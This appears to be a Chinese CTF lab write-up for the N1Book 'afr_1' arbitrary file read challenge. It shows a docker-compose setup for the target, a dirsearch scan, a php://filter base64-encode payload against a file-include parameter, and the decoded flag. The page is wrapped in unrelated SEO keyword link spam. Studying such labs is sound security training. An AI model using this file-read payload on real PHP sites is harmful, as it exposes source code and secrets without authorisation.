当前位置: 首页 > news >正文

凡科建站网址网站和网页有什么区别

凡科建站网址,网站和网页有什么区别,长沙做网站建设的,怎么让别人访问自己做的网站1.1漏洞描述 漏洞名称任意文件读取漏洞 afr_1漏洞类型文件读取漏洞等级⭐漏洞环境docker攻击方式 1.2漏洞等级 高危 1.3影响版本 暂无 1.4漏洞复现 1.4.1.基础环境 靶场docker工具BurpSuite 1.4.2.靶场搭建 1.创建docker-compose.yml文件 version: 3.2 services: web: …

1.1漏洞描述

漏洞名称任意文件读取漏洞 afr_1
漏洞类型文件读取
漏洞等级
漏洞环境docker
攻击方式

1.2漏洞等级

高危

1.3影响版本

暂无

1.4漏洞复现

1.4.1.基础环境

靶场docker
工具BurpSuite

1.4.2.靶场搭建

        1.创建docker-compose.yml文件

version: '3.2'

services:
  web:
    image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-1:latest
    ports:
      - 80:80

        2.将该代码写入文件

启动方式

docker-compose up -d

flag

n1book{afr_1_solved}

关闭

sudo docker-compose down

        3.访问kali 80端口

        搭建成功 

1.5深度利用

1.5.1漏洞点

  • 1.dirsearch目录扫描

dirsearch --url http://10.9.47.79 

  • 2.查看 /flag.php

  • 3.查看/index.php

  • 发现跳转到 ?p=hello

所以可能是/index.html包含了?p=hello

文件包含

  • 4.使用php://fileter 读取(读取php源码)

?filepath=php://filter/read=convert.base64-encode/resource=[目标文件]

  • 它读取到的结果是base64加密的 

PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9

  • 5.进行base64解码

  • 6.成功拿到flag

n1book{afr_1_solved}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级

  • 打补丁

  • 上设备

http://www.yayakq.cn/news/324253/

相关文章:

  • 开发网站怎么挣钱海南开发公司
  • 做基础网站主机要?建立大安全大应急框架
  • 做磨毛布内销哪个网站比较好网站英语
  • 网站的营销方法fuzzz的wordpress模板
  • 网站建设销售渠道怎么开网站 第一步怎么做
  • 网站赚流量天津外贸seo推广
  • 兰州网站建设加王道下拉易思企业网站
  • 先做网站再付款建企业网站行业网
  • 定制网站多少钱手机网站开发需求 百度云盘
  • 网站的标准通过付费网站做lead
  • 苏州模板网站专业设计专业做生鲜的网站好
  • 网站在建设中模板下载怎样在网站上做专栏
  • 湛江百度网站快速排名成都旅游线路
  • 网站开发简历深圳龙岗网站建设公司哪家好
  • 深信服对单一网站做限速网站宣传的重要性
  • 怎么看网站开发的发展互联网公司有哪些
  • 音乐网站系统怎么做网红营销活动
  • 达州网站建设qinsanw成都旅游学院
  • 帝国cms灵动标签做网站地图秦皇岛做网站优化
  • 做电子签章登录哪个网站网站怎么制作 推广
  • 触摸网站手机桂林模板网站建设
  • 外贸自己做网站怎样做网站首页图片变换
  • 那个网站有用director做的片头雅安移动网站建设
  • 自建站需要注册公司吗个人简历模板word可编辑
  • 网站建设添加资料手机app下载安装免费下载
  • 怎么做集团网站做暧暧国外网站
  • 网站建立平台 cms正规网站制作价格
  • 网站动态搜索框代码做的比较好的美食网站
  • 兰州网站移动端优化学美工培训费大概多少
  • 网站建设代理费用设计作品网站有哪些